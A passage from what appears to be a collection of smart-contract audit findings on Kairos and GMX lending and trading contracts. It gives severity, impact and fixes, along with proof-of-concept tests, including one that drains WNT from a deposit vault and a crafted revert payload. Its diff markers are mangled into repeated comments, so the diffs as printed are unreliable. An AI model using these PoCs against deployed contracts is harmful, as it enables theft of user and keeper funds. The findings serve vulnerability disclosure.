reverted, causing the collateral NTF to persist in the contract forever.\\nThe platform allows users to sign offers and provide funds to those who need to borrow assets.\\nIn the first scenario, the lender provided an offer that the `loanTovalue` as high as the result of the `shareMatched` is `0`. For example, if the borrowed amount was `1e40` and the offer had a `loanTovalue` equal to `1e68`, the share would be `0`.\\nAs a result, an arithmetic error (Division or modulo by 0) will occur in the `price()` function at line 50 during the liquidation process.\\nIn the second scenario, if the lender's share exceeds `0`, but the offer's `loanToValue` is extremely high, the `price()` function at line 54 may encounter an arithmetic error(Arithmetic over/underflow) during the `estimatedValue` calculation.\\nPoof of Concept\\nkairos-contracts/test/BorrowBorrow.t.sol\\n```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(\"price of loanId\", kairos.price(loanId));\\n}\\n```\\nчWe recommend adding the mechanism during the borrowing process to restrict the maximum `loanToValue` limit and ensure that the lender's share is always greater than zero. This will prevent arithmetic errors.чThe loan position will not be liquidated, which will result in the collateral NTF being permanently frozen in the contract.ч```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(\"price of loanId\", kairos.price(loanId));\\n}\\n```\\n -Adversary can utilize a large number of their own loans to cheat other lenders out of interestчmediumчThe minimal interest paid by a loan is scaled by the number of provisions that make up the loan. By inflating the number of provisions with their own provisions then can cause legitimate lenders to receive a much lower interest rate than intended.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nIf a loan is paid back before the minimal interest rate has been reached then each provision will receive the unweighted minimal interest amount. This can be abused to take loans that pay legitimate lenders a lower APR than expected, cheating them of their yield.\\nExample: A user wishes to borrow 1000 USDC at 10% APR. Assume the minimal interest per provision is 10 USDC and minimum borrow amount is 20 USDC. After 1 year the user would owe 100 USDC in interest. A user can abuse the minimum to pay legitimate lenders much lower than 10% APR. The attacker will find a legitimate offer to claim 820 USDC. This will create an offer for themselves and borrow 20 USDC from it 9 times. This creates a total of 10 provisions each owed a minimum of 10 USDC or 100 USDC total. Now after 1 year they owe 100 USDC on their loan and the repay the loan. Since 100 USDC is the minimum, each of the 10 provisions will get their minimal interest. 90 USDC will go to their provisions and 10 will go to the legitimate user who loaned them a majority of the USDC. Their APR is ~1.2% which is ~1/9th of what they specified.чThe relative size of the provisions should be enforced so that one is not much larger than any other oneчLegitimate users can be cheated out of interest owedч```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n -minOfferCost can be bypassed in certain scenariosчmediumчminOfferCost is designed to prevent spam loan requests that can cause the lender to have positions that cost more gas to claim than interest. Due to how interest is calculated right after this minimum is passed it is still possible for the lender to receive less than the minimum.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nWhen a loan has generated more than the minimum interest amount the method for calculating the interest paid is different and depending on the size of the provisions it may lead to provisions that are under the guaranteed minimum.\\nExample: Assume the minimum interest is 1e18. A loan is filled with 2 provisions. The first provision is 25% and the second is 75%. Since there are two loans the total minimum interest for the loan is 2e18. After some time the paid interest reaches 2.001e18 and the loan is paid back. Since it is above the minimum interest rate, it is paid out proportionally. This gives 0.5e18 to the first provision and 1.5e18 to the second provision. This violates the minimum guaranteed interest amount.чMinimum interest should be set based on the percentage of the lowest provision and provision shouldn't be allowed to be lower than some amount. Since this problem occurs when the percentage is less than 1/n (where n is the number of provisions), any single provision should be allowed to be lower than 1/(2n).чMinimum interest guarantee can be violatedч```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n -Incomplete error handling causes execution and freezing/cancelling of Deposits/Withdrawals/Orders to fail.чhighчUsers can define callbacks for Deposits/Withdrawals/Orders execution and cancellations. GMX protocol attempts to manage errors during the execution of the callbacks\\nA user controlled callback can return a specially crafted revert reason that will make the error handling revert.\\nBy making the execution and cancelation revert, a malicious actor can game orders and waste keeper gas.\\nThe bug resides in ErrorUtilss `getRevertMessage` that is called on every callback attempt. Example of deposit callback:\\n```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n\\nAs can be seen in the above above snippets, the `reasonBytes` from the catch statement is passed to `getRevertMessage` which tries to extract the `Error(string)` message from the revert. The issue is that the data extracted from the revert can be crafted to revert on `abi.decode`.\\nI will elaborate: Correct (expected) revert data looks as follows: 1st 32 bytes: 0x000..64 (bytes memory size) 2nd 32 bytes: 0x08c379a0 (Error(string) selector) 3rd 32 bytes: offset to data 4th 32 bytes: length of data 5th 32 bytes: data\\n`abi.decode` reverts if the data is not structure correctly. There can be two reasons for revert:\\nif the 3rd 32 bytes (offset to data) is larger then the uint64 (0xffffffffffffffff)\\nSimplified yul: `if gt(offset, 0xffffffffffffffff) { revert }`\\nif the 3rd 32 bytes (offset to data) is larger then the uint64 of the encoded data, the call will revert\\nSimplieifed yul: `if iszero(slt(add(offset, 0x1f), size) { revert }`\\nBy reverting with the following data in the callback, the `getRevertMessage` will revert: 0x000....64 0x0x08c379a0...000 0xffffffffffffffff....000 0x000...2 0x4141чWhen parsing the revert reason, validate the offsets are smaller then the length of the encoding.чThere are two impacts will occur when the error handling reverts:\\n(1) Orders can be gamed\\nSince the following callbacks are controlled by the user,:\\n`afterOrderExecution`\\n`afterOrderCancellation`\\n`afterOrderFrozen`\\nThe user can decide when to send the malformed revert data and when not. Essentially preventing keepers from freezing orders and from executing orders until it fits the attacker.\\nThere are two ways to game the orders:\\nAn attacker can create a risk free order, by setting a long increase order. If the market increases in his favor, he can decide to \"unblock\" the execution and receive profit. If the market decreases, he can cancel the order or wait for the right timing.\\nAn attacker can create a limit order with a size larger then what is available in the pool. The attacker waits for the price to hit and then deposit into the pool to make the transaction work. This method is supposed to be prevented by freezing orders, but since the attacker can make the `freezeOrder` revert, the scenario becomes vulnerable again.\\n(2) drain keepers funds\\nSince exploiting the bug for both execution and cancellation, keepers will ALWAYS revert when trying to execute Deposits/Withdrawals/Orders. The protocol promises to always pay keepers at-least the execution cost. By making the execution and cancellations revert the Deposits/Withdrawals/Orders will never be removed from the store and keepers transactions will keep reverting until potentially all their funds are wasted.ч```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n -Keeper can make deposits/orders/withdrawals fail and receive fee+rewardsчmediumчMalicious keeper can make execution of deposits/orders/withdrawals fail by providing limited gas to the execution.\\nIf enough gas is sent for the cancellation to succeed but for the execution to fail the keeper is able to receive the execution fee + incentive rewards and cancel all deposits/orders/withdrawals.\\n```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\nFor the attack to succeed, the keeper needs to make `this._executeDeposit` revert. Due to the 64/63 rule the attack will succeed if both of the following conditions meet:\\n63/64 of the supplied gas will cause an out of gas in the `try` statement\\n1/64 of the supplied gas is enough to execute the `catch` statement.\\nConsidering `2000000` is the max callback limit and native token transfer gas limit is large enough to support contracts the above conditions can be met.чAdd a buffer of gas that needs to be supplied to the execute function to make sure the `try` statement will not revert because of out of gas.чKeeper can remove all deposits/withdrawals/orders from the protocol.\\nEssentially stealing all execution fees paid\\nKeeper can create deposits and by leveraging the bug can cancel them when executing while receiving rewards.\\nVaults will be drainedч```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n -WNT in depositVault can be drained by abusing initialLongToken/initialShortToken of CreateDepositParamsчhighчThe attacker can abuse the initialLongToken/initialShortToken of `CreateDepositParams` to drain all the WNT from depositVault.\\n```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n\\nThe `initialLongToken` and `initialShortToken` of `CreateDepositParams` can be set to any token address and there is no check for the `initialLongToken` and `initialShortToken` during `createDeposit`. The attacker can set initialLongToken/initialShortToken to a token(USDC e.g.) with less value per unit than WNT and for a market with `market.longToken == wnt` or `market.shortToken == wnt`, `params.executionFee` will be wrongly subtracted from `initialLongTokenAmount` or `initialLongTokenAmount`. This allows the attacker to have a controllable large `params.executionFee` by sending tokens with less value. By calling `cancelDeposit`, `params.executionFee` amount of WNT will be repaid to the attacker.\\nHere is a PoC test case that drains WNT from depositVault:\\n```\\ndiff --git a/gmx-synthetics/test/router/ExchangeRouter.ts b/gmx-synthetics/test/router/ExchangeRouter.ts\\nindex 7eca238..c40a71c 100644\\n--- a/gmx-synthetics/test/router/ExchangeRouter.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx-synthetics/test/router/ExchangeRouter.ts\\n@@ -103,6 // Add the line below\\n103,82 @@ describe(\"ExchangeRouter\", () => {\\n });\\n });\\n \\n// Add the line below\\n it(\"createDepositPoC\", async () => {\\n// Add the line below\\n // simulate normal user deposit\\n// Add the line below\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n await usdc.connect(user0).approve(router.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n const tx = await exchangeRouter.connect(user0).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"sendWnt\", [depositVault.address, expandDecimals(11, 18)]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"sendTokens\", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n expandDecimals(50 * 1000, 6),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"createDeposit\", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user0.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: ethUsdMarket.longToken,\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [ethUsdMarket.marketToken, ethUsdSpotOnlyMarket.marketToken],\\n// Add the line below\\n shortTokenSwapPath: [ethUsdSpotOnlyMarket.marketToken, ethUsdMarket.marketToken],\\n// Add the line below\\n minMarketTokens: 100,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee,\\n// Add the line below\\n callbackGasLimit: \"200000\",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n { value: expandDecimals(11, 18) }\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // depositVault has WNT balance now\\n// Add the line below\\n let vaultWNTBalance = await wnt.balanceOf(depositVault.address);\\n// Add the line below\\n expect(vaultWNTBalance.eq(expandDecimals(11, 18)));\\n// Add the line below\\n\\n// Add the line below\\n // user1 steal WNT from depositVault\\n// Add the line below\\n await usdc.mint(user1.address, vaultWNTBalance.add(1));\\n// Add the line below\\n await usdc.connect(user1).approve(router.address, vaultWNTBalance.add(1));\\n// Add the line below\\n\\n// Add the line below\\n // Step 1. create deposit with malicious initialLongToken\\n// Add the line below\\n await exchangeRouter.connect(user1).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"sendTokens\", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n vaultWNTBalance.add(1),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"createDeposit\", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user1.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: usdc.address, // use usdc instead of WNT\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [],\\n// Add the line below\\n shortTokenSwapPath: [],\\n// Add the line below\\n minMarketTokens: 0,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee: vaultWNTBalance,\\n// Add the line below\\n callbackGasLimit: \"0\",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // Step 2. cancel deposit to drain WNT\\n// Add the line below\\n const depositKeys = await getDepositKeys(dataStore, 0, 2);\\n// Add the line below\\n // const deposit = await reader.getDeposit(dataStore.address, depositKeys[1]);\\n// Add the line below\\n // console.log(deposit);\\n// Add the line below\\n // console.log(depositKeys[1]);\\n// Add the line below\\n await expect(exchangeRouter.connect(user1).cancelDeposit(depositKeys[1]));\\n// Add the line below\\n\\n// Add the line below\\n // WNT is drained from depositVault\\n// Add the line below\\n expect(await wnt.balanceOf(depositVault.address)).eq(0);\\n// Add the line below\\n });\\n// Add the line below\\n\\n it(\"createOrder\", async () => {\\n const referralCode = hashString(\"referralCode\");\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n```\\nч```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\nindex fae1b46..2811a6d 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n@@ // Remove the line below\\n74,9 // Add the line below\\n74,9 @@ library DepositUtils {\\n \\n address wnt = TokenUtils.wnt(dataStore);\\n \\n// Remove the line below\\n if (market.longToken == wnt) {\\n// Add the line below\\n if (params.initialLongToken == wnt) {\\n initialLongTokenAmount // Remove the line below\\n= params.executionFee;\\n// Remove the line below\\n } else if (market.shortToken == wnt) {\\n// Add the line below\\n } else if (params.initialShortToken == wnt) {\\n initialShortTokenAmount // Remove the line below\\n= params.executionFee;\\n } else {\\n uint256 wntAmount = depositVault.recordTransferIn(wnt);\\n```\\nчThe malicious user can drain all WNT from depositVault.ч```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n -Incorrect function call leads to stale borrowing feesчhighчDue to an incorrect function call while getting the total borrow fees, the returned fees will be an inaccurate and stale amount. Which will have an impact on liquidity providers\\nAs said the function getTotalBorrowingFees:\\n```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n\\ncalculates the fess by calling getCumulativeBorrowingFactor(...):\\nwhich is the wrong function to call because it returns a stale borrowing factor. To get the actual borrowing factor and calculate correctly the borrowing fees, GMX should call the `getNextCumulativeBorrowingFactor` function:\\nWhich makes the right calculation, taking into account the stale fees also:\\n```\\n uint256 durationInSeconds = getSecondsSinceCumulativeBorrowingFactorUpdated(dataStore, market.marketToken, isLong);\\n uint256 borrowingFactorPerSecond = getBorrowingFactorPerSecond(\\n dataStore,\\n market,\\n prices,\\n isLong\\n );\\n\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market.marketToken, isLong);\\n\\n uint256 delta = durationInSeconds * borrowingFactorPerSecond;\\n uint256 nextCumulativeBorrowingFactor = cumulativeBorrowingFactor + delta;\\n return (nextCumulativeBorrowingFactor, delta);\\n```\\nчIn order to mitigate the issue, call the function `getNextCumulativeBorrowingFactor` instead of the function `getCumulativeBorrowingFactor()` for a correct accounting and not getting stale feesчAss fee calculation will not be accurate, liquidity providers will be have a less-worth token because pending fees are not accounted in the pool's valueч```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n -Limit orders can be used to get a free look into the futureчhighчUsers can continually update their orders to get a free look into prices in future blocks\\nOrder execution relies on signed archived prices from off-chain oracles, where each price is stored along with the block range it applies to, and limit orders are only allowed to execute with oracle prices where the block is greater than the block in which the order was last updated. Since prices are required to be future prices, there is a time gap between when the last signed price was archived, and the new price for the next block is stored in the archive, and the order keeper is able to fetch it and submit an execution for it in the next block.\\nThe example given by the sponsor in discord was:\\n```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\nчRequire a delay between when the order was last increased/submitted, and when an update is allowed, similar to REQUEST_EXPIRATION_BLOCK_AGE for the cancellation of market ordersчIf a user has a pending exit order that was submitted a block N, and the user sees that the price at block N+1 will be more favorable, they can update their exit order, changing the amount by +/- 1 wei, and have the order execution delayed until the next block, at which point they can decided again whether the price and or impact is favorable, and whether to exit. In the sponsor's example, if the order was submitted at block 101, they have until block 105 to decide whether to update their order, since the order execution keeper won't be able to do the execution until block 106. There is a gas cost for doing such updates, but if the position is large enough, or the price is gapping enough, it is worth while to do this, especially if someone comes up with an automated service that does this on your behalf.\\nThe more favorable price for the attacker is at the expense of the other side of the trade, and is a loss of capital for them.ч```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\n -Creating an order of type MarketIncrease opens an attack vector where attacker can execute txs with stale prices by inputting a very extense swapPathчhighчThe vulnerability relies on the create order function:\\n```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n }\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n\\nSpecifically, on a marketIncrease OrderType. Executing an order type of marketIncrease opens an attack path where you can execute transactions with stale prices.\\nThe way to achieve this, is by creating a market increase order and passing a very extensive swapPath in params:\\n```\\n BaseOrderUtils.CreateOrderParams memory params\\n\\n\\n struct CreateOrderParams {\\n CreateOrderParamsAddresses addresses;\\n CreateOrderParamsNumbers numbers;\\n Order.OrderType orderType;\\n Order.DecreasePositionSwapType decreasePositionSwapType;\\n bool isLong;\\n bool shouldUnwrapNativeToken;\\n bytes32 referralCode;\\n }\\n\\n struct CreateOrderParamsAddresses {\\n address receiver;\\n address callbackContract;\\n address market;\\n address initialCollateralToken;\\n address[] swapPath; //HEREE <--------------------------------------------------------\\n }\\n\\nThe swap path has to be as long as it gets close to the gasLimit of the block.\\n```\\n\\nAfter calling 